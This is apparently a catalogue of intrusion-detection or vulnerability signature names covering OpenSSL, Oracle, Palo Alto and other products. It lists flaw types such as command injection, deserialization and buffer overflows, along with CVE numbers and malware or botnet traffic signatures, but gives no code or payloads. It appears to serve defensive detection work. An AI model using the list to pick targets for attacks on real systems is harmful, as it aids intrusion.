OpenSSH-Sshd-Username-Information-Disclosure
OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
OpenSSL-Anonymous-ECDH-Denial-Of-Service
OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution
OpenSSL-ASN.1-Client-Sertificate-BOF
OpenSSL-ASN.1-Integer-Overflow-DoS
OpenSSL-ASN1-Type_cmp-Denial-Of-Service
OpenSSL-BN_Mod_sqrt-Infinite-Loop
OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow
OpenSSL-ChangeCipher-MITM-Security-Bypass
OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
OpenSSL-C_rehash-Script-Command-Injection-Vulnerability
OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability
OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service
OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service
OpenSSL-DTLS-Handshake-Double-Free
OpenSSL-DTLS-Handshake-Memory-Exhaustion
OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS
OpenSSL-DTLS-Recursion-Denial-Of-Service
OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service
OpenSSL-Dtls1_Process_Out_Of_Seq_Message-Denial-Of-Service
OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow
OpenSSL-ECDH-Use-After-Free
OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
OpenSSL-Email-Address-Variable-Length-Buffer-Overflow-CVE-2022-3786
OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow
OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service
OpenSSL-Invalid-SRP-Parameter-Buffer-Overflow
OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow
OpenSSL-Large-Dh-Parameter-Denial-Of-Service
OpenSSL-Malformed-Client-Key-Buffer-Overflow
OpenSSL-Null-Pointer-Dereference-CVE-2020-1971
OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service
OpenSSL-RSA-To-EXPORT_RSA-Downgrade-Attack
OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow
OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference
OpenSSL-SSL3_al_warning-Denial-Of-Service
OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
OpenSSL-TLS-AES-NI-DoS
OpenSSL-TLS-Connection-Record-Handling-Denial-Of-Service
OpenSSL-TLS-Heartbeat-Vulnerability
OpenSSL-TLS-Record-Tampering-Denial-Of-Service
OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference
OpenSSL-Tlsext_Type_status_request-Memory-Leak-Denial-Of-Service
OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free
OpenSSL-X.509-Email-Address-4-Byte-Buffer-Overflow-CVE-2022-3602
OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read
OpenSSL-X509_cmp_Time-Denial-Of-Service
OpenTSDB-2.4.0-Unauthenticated-Command-Injection
OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-25826
OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-36812
OpenVAS-Web-Vulnerability-Scanner
OpenVMPS-Syslog-Format-String
OpenVPN-P_Control-Denial-Of-Service
OpenVPN-Read_Key-Stack-Based-Buffer-Overflow
OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service
Openwsman-HTTP-Basic-Authentication-Buffer-Overflow
OpenX-File-Upload-PHP-Code-Execution
OpenX-Flowplayer-Backdoor-Remote-Code-Execution
Opera-Browser-Content-Length-Buffer-Overflow
Opera-Browser-Document-Writing-Uninitialized-Memory-Access
Opera-Browser-File-URI-Handling-Buffer-Overflow
Opera-History-Search-Cross-Site-Scripting
Opera-Preferences-Modification
Opera-Software-Opera-GIF-Processing-Memory-Corruption
Opera-SVG-Animation-Element-DoS
Opera-SVG-clipPath-After-Memory-Corruption
OPIE-FTP-Username-Off-By-One-Stack-Buffer-Overflow
Opmantek-NMIS-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5642
Opmantek-Open-Audit-Discoveries_Helper-Command-Injection
Opmantek-Open-Audit-M_discoveries.php-Command-Injection
Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor
Optima-Apiftp-Server-Exe-Denial-of-Service
Oracle-10g-Isqlplus-Service-Heap-Overflow
Oracle-9i-Xml-Database-BOF
Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization
Oracle-Application-Server-10g-Emagent.exe-Stack-Buffer-Overflow
Oracle-Application-Server-10g-OPMN-Service-Format-String-Vulnerability
Oracle-Application-Server-9i-WebCache-File-Corruption
Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution
Oracle-Application-Server-Portal-Cross-Site-Scripting
Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution
Oracle-Application-Server-XSS
Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass
Oracle-Application-Testing-Suite-Authentication-Bypass
Oracle-Application-Testing-Suite-Download-Schedulereportname-Directory-Traversal
Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal
Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal
Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal
Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal
Oracle-Application-Testing-Suite-Reportname-Directory-Traversal
Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal
Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal
Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal
Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal
Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow
Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation
Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation
Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation
Oracle-Bea-WebLogic-10-XSS
Oracle-Bea-WebLogic-DOS
Oracle-Bea-WebLogic-Server-Apache-Connector-HTTP-Version-String-Buffer-Overflow
Oracle-Bea-WebLogic-Server-Console-help.portal-XSS
Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow
Oracle-BeeHive-Voice-Servlet
Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure
Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization
Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection
Oracle-Business-Intelligence-CVE-2021-2456-Insecure-Deserialization
Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting
Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864
Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure
Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection
Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection
Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
Oracle-Business-Intelligence-SQL-Injection
Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload
Oracle-Business-Transaction-Management-Arbitrary-File-Creation
Oracle-Business-Transaction-Management-Flashtunnel-Arbitrary-File-Deletion
Oracle-Client-System-Analyzer-Arbitrary-File-Upload
Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization
Oracle-Create-Database-Link-Buffer-Overflow
Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference
Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference
Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Deref
Oracle-Data-Quality-Loaderwizard-Datapreview-Type-Confusion
Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference
Oracle-Data-Quality-Trillium-Based-Setbasicpreviewdata-Type-Confusion
Oracle-Data-Quality-Trillium-Based-Setentities-Type-Confusion
Oracle-Database-Application-Express-Password-Hash-Disclosure
Oracle-Database-Core-Rdbms-Component-Denial-Of-Service
Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow
Oracle-Database-DBMS-AQADM-Sys-Package-Grant-Type-Access-Procedure-SQL-Injection
Oracle-Database-DBMS-Assert-Filter-Bypass
Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Oracle-Database-DBMS-Scheduler-Privilege-Escalation
Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service
Oracle-Database-DBMS_Java.Set_Output_To_Java-Privilege-Escalation
Oracle-Database-DBMS_JVM_EXP_PERMS-System-Command-Execution
Oracle-Database-DBMS_Snap_Internal-Package-Buffer-Overflow
Oracle-Database-InterMedia-DoS
Oracle-Database-REPCAT_RPC.VALIDATE_REMOTE_RC-SQL-Injection
Oracle-Database-Server-Access-Control-Bypass
Oracle-Database-Server-Authentication-Username-Buffer-Overflow
Oracle-Database-Server-CREATE_TABLES-SQL-Injection
Oracle-Database-Server-ctxsys.driload-Access-Violation
Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
Oracle-Database-Server-DBMS-CDC-PUBLISH-SQL-Injection
Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow
Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
Oracle-Database-Server-MD2-Package-Buffer-Overflow
Oracle-Database-Server-MD2-SDO-Code-Size-BOF
Oracle-Database-Server-MD2-Validate-Geom-BOF
Oracle-Database-Server-SDO_CS-TRANSFORM_LAYER-Buffer-Overflow
Oracle-Database-Server-SQL-Query-Directory-Traversal
Oracle-Database-Server-String-Conversion-Function-BOF
Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
Oracle-Database-Server-Sys-KUPV-SQL-Injection
Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection
Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow
Oracle-Database-Server_DBMS-Metadata-Package-SQL-Injection
Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Oracle-Database-Sys.lt.findricset-SQL-Injection
Oracle-Database-SYS.OLAPIMPL_T-Package-ODCITABLESTART-Buffer-Overflow
Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication
Oracle-Database-Trigger-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability
Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
Oracle-Demantra-Demand-Management-File-Download
Oracle-Demantra-Demand-Management-Information-Leak
Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Buffer-Overflow
Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
Oracle-Document-Capture-EasyMail-ActiveX-Control
Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS
Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS
Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-XSS
Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS
Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587
Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545
Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS
Oracle-E-Business-Suite-Desktop-Integrator-Bnedecoder-Dir-Traversal
Oracle-E-Business-Suite-General-Ledger-SQL-Injection
Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection
Oracle-E-Business-Suite-Human-Resources-SQL-Injection
Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting
Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting
Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop
Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop
Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882
Oracle-E-Business-Suite-Work-In-Process-SQL-Injection
Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal
Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal
Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability
Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution
Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604
Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal
Oracle-Fusion-Middleware-Information-Disclosure
Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-DirTrav
Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow
Oracle-Fusion-Middleware-Remote-Code-Execution
Oracle-GlassFish-Server-Malformed-Username-Cross-Site-Scripting
Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities
Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities
Oracle-GlassFish-Server-Themeservlet-Directory-Traversal
Oracle-GoldenGate-Manager-Command-Report-DoS
Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow
Oracle-GoldenGate-Manager-Tab-Parsing-DoS
Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow
Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636
Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow
Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials
Oracle-Iplanet-Web-Server-Information-Disclosure-Attack
Oracle-Java-2d-Imaginglib-Integer-Overflow
Oracle-Java-7-Applet-Remote-Code-Execution
Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass
Oracle-Java-Atomicreferencearray-Sandbox-Breach
Oracle-Java-Awt_setpixels-Information-Disclosure
Oracle-Java-Beans-Documenthandler-Xml-External-Entity
Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
Oracle-Java-Filedialog.show-Heap-Buffer-Overflow
Oracle-Java-Final-Field-Overwrite
Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow
Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow
Oracle-Java-Font-Processing-Memory-Corruption
Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass
Oracle-Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption
Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
Oracle-Java-PhantomReference-Use-After-Free
Oracle-Java-Private-Methodhandle-Sandbox-Bypass
Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution
Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution
Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
Oracle-Java-Runtime-Environment-Insecure-File-Loading
Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow
Oracle-Java-Sandbox-Breach
Oracle-Java-SE-Gsub-Featurecount-Buffer-Overflow
Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow
Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access
Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack
Oracle-Java-SE-XML-Digital-Signature-Spoofing
Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422
Oracle-Java-Security-Slider-Feature-Bypass
Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass
Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow
Oracle-Java-Statistics.impl-Package-Sandbox-Breach
Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow
Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption
Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
Oracle-Java-System.arraycopy-Race-Condition
Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error
Oracle-Java-Web-Start-Command-Argument-Injection-Remote-Code-Execution
Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption
Oracle-Java-Zip_Util-Readcen-Stack-Overflow
Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization
Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption
Oracle-Multiple-Products-Hash-Collision-Denial-of-Service
Oracle-MySQL-Authentication-Integer-Overflow
Oracle-Mysql-Client-Heap-Buffer-Overflow
Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution
Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution
Oracle-MySQL-Cluster-Data-Node-GSN_Processinfo_Rep-Remote-Code-Execution
Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow
Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow
Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow
Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE
Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow
Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow
Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow
Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow
Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service
Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service
Oracle-MySQL-Delete-Heap-Buffer-Overflow
Oracle-MySQL-Drop-Table
Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow
Oracle-MySQL-Payload-Execution
Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service
Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow
Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow
Oracle-Mysql-Server-Innodb-Memcached-Plugin-Resource-Exhaustion
Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow
Oracle-Mysql-Server-Xpath-Denial-Of-Service
Oracle-Opera-Remote-Code-Execution-CVE-2023-21932
Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection
Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow
Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow
Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2
Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read
Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read
Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write
Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow
Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-Buffer-Overflow
Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow
Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service
Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow
Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2
Oracle-Outside-In-OS22-Metafile-Parser-Heap-Buffer-Overflow
Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service
Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow
Oracle-Reports-Service-File-Overwrite
Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection
Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection
Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection
Oracle-Secure-Backup-Administration-Server-Authentication-Bypass
Oracle-Secure-Backup-Administration-Server-Command-Injection
Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection
Oracle-Secure-Backup-Command-Injection
Oracle-Secure-Backup-Exec_qr-Command-Injection
Oracle-Secure-Backup-NDMP-Connect-Username-BOF
Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service
Oracle-Secure-Backup-Objectname-Variable-Command-Injection
Oracle-Secure-Backup-observiced.exe-Buffer-Overflow
Oracle-Secure-Backup-Server-Authentication-Bypass
Oracle-Secure-Backup-Server-Login-Command-Injection
Oracle-Secure-Backup-Server-Login-Cookies-Command-Injection
Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting
Oracle-Single-Sign-On-Vulnerability
Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow
Oracle-SQL-Injection-Database-Compromise
Oracle-Sys-Pbsde-Init-BOF
Oracle-TimesTen-Evtdump-Format-Strings-Vulnerability
Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service
Oracle-TNS-Service-Name-BOF
Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure
Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow
Oracle-Virtual-Server-Agent-Command-Injection
Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection
Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections
Oracle-Web-Cache-Unspecified-Client-Request-Handling
Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Control-Code-Execution
Oracle-Webcenter-Forms-Recognition-ActiveX-Control-Arbitrary-File-Creation
Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability
Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization
Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization
Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection
Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization
Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization
Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection
Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection
Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394
Oracle-WebLogic-Limitfilter-Insecure-Deserialization
Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection
Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection
Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization
Oracle-WebLogic-Server-Admin-Console-War-Deployment
Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection
Oracle-WebLogic-Server-Arbitrary-File-Upload
Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization
Oracle-WebLogic-Server-CVE-2020-14825
Oracle-WebLogic-Server-CVE-2020-14882
Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection
Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal
Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization
Oracle-WebLogic-Server-Deserialization-RCE
Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability
Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure
Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization
Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839
Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931
Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371
Oracle-WebLogic-Server-Node-Manager-Command-Execution
Oracle-WebLogic-Server-RCE-Vulnerability-CVE-2019-2725
Oracle-WebLogic-Server-Remote-Command-Execution-CVE-2017-3506
Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization
Oracle-WebLogic-Server-Session-Fixation
Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization
Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload
Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization
Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection
Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection
Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection
Oracle10g-TNS-Auth-Sesskey-BOF
Oracle8i-TNS-Listener-BOF
Orbit-Downloader-Stack-Based-Buffer-Overflow
Orcus-RAT-Infection-Traffic
OrientDB-Remote-Code-Execution
osCommerce-Installer-Unauthenticated-Code-Execution
Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691
Outlook-BOF-MS04-009
Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution
Overly-Long-RTSP-Host-Header
Owncloud-Information-Disclosure-CVE-2023-49103
Ozdok-Bot
OzymanDNS-Tunnel
PAC-Resolver-Remote-Code-Execution
PacketTrap-TFTP-Server-Denial-Of-Service
PAJAX-Remote-Command-Execution
Palevo-Botnet
Palo-Alto-Expedition-Command-Injection-CVE-2024-9463
Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910
Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464
Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107
Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465
Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion
Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108
Palo-Alto-SSLVPN-Authentication-Bypass
Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474
PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400
PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579
PAN-OS-Remote-Code-Execution-CVE-2017-15944
Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow
Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow
Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow
Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow
Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320
Pandora-FMS-Authentication-Bypass
Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971
Pandora-FMS-Events-RCE
Pandora-FMS-Ping-Authenticated-RCE
Papercut-Fileuploadauthenticationfilter-Authentication-Bypass
Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350
Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351
Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting
Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery
Papercut-NG-External-User-Lookup-Code-Injection
Papercut-WebDAV-Path-Traversal-CVE-2023-39143
Paradoxyhua-Botnet
Parallax-RAT-Traffic
Parse-Server-Databasecontroller-Prototype-Pollution
Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection
Parse-Server-literalizeRegexPart-SQL-Injection
Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396
Pastebin-File-Potentially-Containing-Malware-C2-Address
Patrowl-PatrowlManager-Unrestricted-File-Upload
PBot-Malware
PCMan-FTP-Server-Directory-Traversal
PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
PDF-Multiple-Stream-Filters-Obfuscation
Pdfium-Heap-Buffer-Overflow-Vulnerability
PDGSoft-Shopping-Cart-Orders-Exposure
Pear-Archive-Tar-CVE-2021-32610-Symbolic-Link-Handling-Arbitrary-File-Write
Pear-Archive-Tar-File-Protocol-Handling-Arbitrary-File-Overwrite
Pear-Archive-Tar-Phar-Protocol-Handling-Deserialization-Code-Execution
Pear-Archive-Tar-Symbolic-Link-Handling-Arbitrary-File-Overwrite
PEDICOM-Polyglot-File
PeerCast-Get-Request-Format-String
PeerCast-HTTP-Authentication-Buffer-Overflow
PeerCast-Stream-Buffer-Overflow
Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE
